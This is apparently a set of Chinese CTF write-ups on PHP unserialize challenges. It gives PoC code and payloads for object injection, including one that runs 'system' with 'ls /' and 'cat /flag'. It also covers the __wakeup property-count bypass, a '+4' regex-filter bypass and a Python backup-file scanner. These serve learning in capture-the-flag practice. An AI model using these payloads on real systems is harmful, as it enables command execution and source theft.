[SWPUCTF 2021 新生赛]ez_unserialize
查看源代码想到robots协议
看这个代码比较简单
直接让admin=admin passwd=ctf就行了
poc
<?php
class wllm
{public $admin;public $passwd;
}$p = new wllm();
$p->admin = "admin";
$p->passwd = "ctf";
echo serialize($p);;
?> payload:
?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
[SWPUCTF 2022 新生赛]1z_unserialize
搞懂这个$a($this->lly);
关键语句
$a() 表示调用一个函数,函数名由变量 $a 的值确定。换句话说,$a 应该是一个存储函数名的变量。当你写 $b() 时,PHP 将尝试调用这个函数,并传递任何必要的参数。
//例如,如果你有一个函数名存储在变量 $a 中,比如 $a = "myFunction";,然后你写 $a(),PHP 将尝试调用 myFunction() 这个函数。
而$a()括号里面的值应该是向函数传递的参数
这样我们让$a的值为命令执行函数 我们就可以成功的命令执行了
poc
class lyh
{public $url = 'NSSCTF.com';public $lt = 'system';public $lly = 'ls /';}$a = new lyh();echo serialize($a);payload
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:4:"ls /";}
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
wakeup()绕过
当反序列化字符串中,表示属性个数的值⼤于真实属性个数时,会绕过 __wakeup 函数的执⾏。
漏洞影响范围
PHP5 < 5.6.25
PHP7 < 7.0.10
标准序列化结果
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
将2改为3 绕过__Wakeup魔法函数
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
[SWPUCTF 2022 新生赛]ez_ez_unserialize
poc
class X
{public $x = 'fllllllag . php';
}$lcycb = new x();
echo serialize($lcycb);payload:
x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
Web_php_unserialize攻防世界
这里就是要绕过这个正则
if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else {@unserialize($var); }
匹配到任意长度的数字 或者oc(类似数字)字符都会被过滤
绕过方式数字前加正号,如+4,正好不改变正数的值,却可以绕过检测
poc
class Demo{private $file = 'fl4g.php';public function __sleep(){return ['file'];}}$lcycb = new Demo();$lcycb = serialize($lcycb);echo $lcycb;$lcycb = str_replace('O:4', 'O:+4', $lcycb);$lcycb = str_replace('"Demo":1:', '"Demo":2:', $lcycb);echo $lcycb;echo base64_encode($lcycb);?>payload
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
unserialize3攻防世界
poc
class xctf{
public $flag = '111';}
$lcycb = new xctf;
echo serialize($lcycb);payload
?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
[极客大挑战 2019]PHP BUUCTF
用脚本扫一下备份
import requestsurl1 = 'http://dbd62227-e75f-44c3-8862-b369e671379e.node5.buuoj.cn:81/' # url为被扫描地址,后不加‘/’# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar']for i in list1:for j in list2:back = str(i) + '.' + str(j)url = str(url1) + '/' + backprint(back + ' ', end='')print(requests.get(url).status_code)
找到
include 'flag.php';error_reporting(0);class Name
{private $username = 'nonono';private $password = 'yesyes';public function __construct($username, $password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;} else {echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}poc
include 'flag.php';error_reporting(0);class Name
{private $username = 'admin';private $password = '100';}
$lcycb = new Name();
echo serialize($lcycb);payload:
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
